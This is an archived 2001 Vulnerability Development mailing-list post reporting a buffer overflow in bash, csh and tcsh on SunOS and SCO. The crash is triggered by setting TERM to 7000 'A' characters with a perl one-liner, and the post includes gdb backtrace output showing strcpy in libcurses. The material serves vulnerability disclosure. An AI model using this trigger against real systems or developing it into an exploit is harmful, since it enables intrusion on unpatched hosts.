|
Vulnerability Development
mailing list archives
bash overflows
From: KF <dotslash () snosoft com>
Date: Tue, 05 Jun 2001 12:49:16 -0400
I have seen at least one post for linux bash overflows but not much
follow up for other OS's.
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26tid%3D13697%26end%3D2001-06-09%26threads%3D0%26start%3D2001-06-03%26
This seems to affect bash and csh and tcsh on SCO and SunOS both.
[6:55pm] () [medusa]#uname -a
SunOS medusa 5.7 Generic_106541-12 sun4m sparc SUNW,SPARCstation-5
[6:55pm] () [medusa]#gdb bash
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) run
Starting program: /usr/local/bin/bash
cannot stat /var/adm/utmpx. Please "unset watch".
bash-2.03$ export TERM=`perl -e 'print "A" x 7000'`
Program received signal SIGSEGV, Segmentation fault.
0xef5b6cb8 in strcpy () from /usr/lib/libc.so.1
(gdb) bt
#0 0xef5b6cb8 in strcpy () from /usr/lib/libc.so.1
#1 0xef7572d4 in setupterm () from /usr/lib/libcurses.so.1
#2 0xef758cd4 in tgetent () from /usr/lib/libcurses.so.1
Cannot access memory at address 0x41414179.
(gdb)
-KF
 By Date 
By Thread
Current thread:
- bash overflows KF (Jun 05)
|
Intro
